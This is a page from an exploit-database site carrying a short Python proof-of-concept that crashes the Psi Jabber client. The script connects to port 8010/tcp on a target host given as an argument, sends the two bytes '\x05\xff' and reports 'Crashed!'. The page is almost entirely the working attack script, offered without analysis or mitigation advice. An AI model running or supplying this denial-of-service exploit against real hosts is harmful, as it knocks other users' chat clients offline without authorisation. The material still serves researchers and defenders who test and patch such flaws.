[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)

Author
Sha0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6692
Category
dos / poc
Date add
23-12-2008
Platform
multiple
=======================================================================
Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)
=======================================================================




#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win & lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close() 



#  0day.today [2024-12-25]  #